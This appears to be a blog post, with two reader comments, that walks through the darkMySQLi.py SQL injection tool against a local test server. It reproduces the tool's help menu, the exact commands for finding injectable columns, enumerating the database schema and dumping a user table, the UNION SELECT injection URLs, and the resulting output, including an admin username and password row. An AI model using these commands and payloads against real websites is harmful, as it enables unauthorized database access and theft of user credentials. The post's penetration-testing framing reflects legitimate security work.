I would like to share with you about darkMySQLi.py, a Multi Purpose MySQL Injection tool that developed by rsauron (rsauron@gmail.com), one of darkc0deCrews (www.darkc0de.com). This Python script allows you to automate 80% of the search and exploitation of SQL injection. I’m using this tool since Feb 2009 and I can say that this tool will help you and reduce time to find Blind SQL or SQL injection during web application penetration testing. This tool is very useful especially for IT security consultant or people who are involved in penetration testing because it will help you to save your time for finding MySQL vulnerability.
Today, I will show you how to use darkMySQLi.py until you successfully compromised MySQL database server. If you used Google and search for “darkMySQLi.py” word, you will see a lot of articles and links about this tool. For more explanations, I hope you can refer to that articles and can download tool from there. When you are using this tool, it is very easy to find MySQL vulnerability and it only takes 2-3 minutes to finish your hands-on for web assessment. So, you will have much time to verify the findings and do research about the solutions to prevent SQL Injection vulnerability.
Before you start using darkMySQLi.py tool, you need to find a vulnerable website or link where you can inject malicious code or character to the vulnerable parameter on the website. For the example below, you can see there is a vulnerability in the id parameter where you can insert character string such as +, - ,",', <>, %,;,(), &. This vulnerability happened because the programmer or webmaster of the server did not sanitize user input and filter out the code properly. When you put or insert character, number and code to the vulnerable parameter, you will see MySQL syntax errors occurred.
Targeted URL: http://192.168.2.10/news/popup_news.php?id=”22
For the targeted URL above, when I try to input this “ at the character string 22 after id parameter at the popup_news.php page, it shows this MySQL syntax error:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/johncrackernet/www/htdocs/functions.php on line 114.
From the syntax error, you can see MySQL vulnerability occurred at character string 22 after id parameter where it allows you to perform SQL injection attack to this website.
Step 1: Finding number of columns in MySQL Database
To perform SQL injection attack, I used darkMySQLi.py to attack the targeted URL above. You must understand and know how to use darkMySQLi.py tool. If you do not understand how to use it, you can refer to the Help menu that built-in together with this tool (Use darkMySQLi.py –h command to see Help menu)
E:\Izhar\Tool\SQL Injection\DarkCode Exploit>darkMySQLi.py -h
darkMySQLi v1.6 rsauron@gmail.com
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information
Target:
-u URL, --url=URL Target url
Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,opt: -T) MySQL v5
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req:-T,opt:-D,-C,--start MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file
Use this command to find the number of columns in the database:
./darkMySQLi.py –u “URL” --findcol
E:\Izhar\Tool\SQL Injection\DarkCode Exploit>darkMySQLi.py –u “http://192.168.2.10/news/popup_news.php?id=22" --findcol
|-------------------------------------------------- |
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
|Multi Purpose MySQL Injection Tool|
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|-------------------------------------------------- |
[+] URL: http://192.168.2.10/news/popup_news.php?id=22
[+] 06:28:14
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
Proxy: 192.168.2.2:8080 - Success
[+] Proxy List Complete
[+] Attempting To find the number of columns...
[+] Testing: 1, 2,3,4,5,6,7,8,9,10,
[+] Column Length is: 10
[+] Found null column at column #: 3,4,7,8,
[!] SQLi URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--
[!] darkMySQLi URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10--
[-] 06:28:23
[-] Total URL Requests: 10
[-] Done
Don't forget to check darkMySQLi.log
From the testing result above, I found a total of 10 columns for database. But, column number 3, 4, 7 & 8 are null column. From SQL Server perspective, a NULL is not a value, it only means that a value was not provided when the row was created. These null columns will give advantage to the attacker to test SQL injection. The results above show SQLi URL and darkMySQLi URL. Based on the Python tool script, darkc0de function will try to concatenate supplied strings using MySQL CONCAT function, test hash database, generates hex representation of string and other functions. From darkMySQLi URL, we can see this darkc0de will try to test SQL injection at null columns for column number 3, 4, 7 & 8.
Step 2: Enumerate all information in MySQL Database
In the first step, I already gather the information about the number of columns in database. I found 10 columns in the database and 4 of columns are null columns. These null columns can be exploited using SQL injection technique. From darkc0de string, this Python tool will try to concatenate all of the information as it can to the null columns by using MySQL CONCAT. In this step, darkMySQLi URL will be using to enumerate all of the information in database. This darkMySQLi URL will replace the previous URL that we have tested in the first step.
Use this command to find all of the information that can gather from database:
./darkMySQLi.py –u “darkMySQLi URL” --full
E:\Izhar\Tool\SQL Injection\DarkCode Exploit>darkMySQLi.py -u “http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1, 2, darkc0de, darkc0de, 5, 6, darkc0de, darkc0de, 9, 10--" --full
|-------------------------------------------------- |
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| Multi Purpose MySQLInjection Tool|
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|-------------------------------------------------- |
[+] URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10
[+] 06:29:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[+] Building Proxy List...
Proxy: 192.168.2.2:8080 - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
Database: dbtraffic
User: johncrackernet@www.crackernet.org
Version: 5.0.45-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 270
[Database]: dbtraffic
[Table: Columns]
[1]TRA_REG: id,tra_name,tra_lastname,tra_address,tra_passport,tra_state
[2]TRA_Events: events_id, events_title, events_url, events_desc, events_sched, events_status
[3]TRA_code: code,item,adl,ingred
[4]banner_ach: id,id_uname,image,impressions,clicks,url
[5]cal_file: id,page_main,filename,code
[6]cal_msg: id,uid,m,d,y,start_time,end_time,title,text,id_text,apprro,website,email
[7]cal_msg_backup: id,uid,m,d,y,start_time,end_time,title,text,id_text,apprro,website,email
[8]cal_name: id,name
[9]cal_users: uid,username,password,fname,lname,userlevel,email
[10]cal_memo: id,memo
[-] 06:35:12
[-] Total URL Requests: 25
[-] Total URL Requests: 25
[-] Done
The results above show this darkMySQLi.py tool successfully worked because it can enumerate all information in MySQL database such as database name, database version, tables, columns and rows. From the tables and columns that I have gathered, some of data are valuable and confidential. An attacker or hacker normally will look at the valuable data such as usernames, passwords, credit card numbers or Paypal accounts. Attackers will try to dump the data to get details and complete information from the servers or machines that they have compromised.
Step 3: Dumping the data from MySQL Database Table
In this step, I want to dump MySQL database table that contain usernames and passwords because all of these data can be consider as valuable and confidential.
Use this command to find all of the information that can gather from database:
./darkMySQLi.py –u “darkMySQLi URL” - -dump –D “Database name” –T “Table name” –C “Column”
E:\Izhar\Tool\SQL Injection\DarkCode Exploit>darkMySQLi.py –u "http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1, 2, dark0de, darkc0de, 5, 6,
darkc0de, darkc0de, 9, 10--" --dump -D dbtraffic -T cal_users -C uid,username,password,fname,lname,userlevel, email
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|
[+] URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10
[+] 07:00:41
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Building Proxy List...
Proxy: 192.168.2.2:8080 - Success
[+] Proxy List Complete
[+] Gathering MySQL Server Configuration...
Database: dbtraffic
User: johncrackernet@www.crackernet.org
Version: 5.0.45-log
[+] Dumping data from database "dbtraffic" Table "cal_users"
[+] and Column(s) ['uid', 'username', 'password', 'fname', 'lname', 'userlevel', 'email']
[+] Number of Rows: 1
[1] 1:admin:password:default:user:2:
[-] 07:00:44
[-] Total URL Requests: 3
[-] Done
Don't forget to check darkMySQLi.log
The results above show that I could gather information about id, username, password, fullname, email, and userlevel from row number 9 that I dumped from MySQL database.
As a conclusion, this darkMySQLi.py is very useful for especially for IT Security Consultant because you can save much times for penetration testing with the better quality findings.
Posts
2 comments:
how to use that tool sir....
i need info.....
Very helpful post, thank you very much.
Only problem is that I would like to see what's 'behind the scenes', what exactly are the strings it sends.
I see only the results.
Any idea about that?
Thank you again, very high quality post.
Post a Comment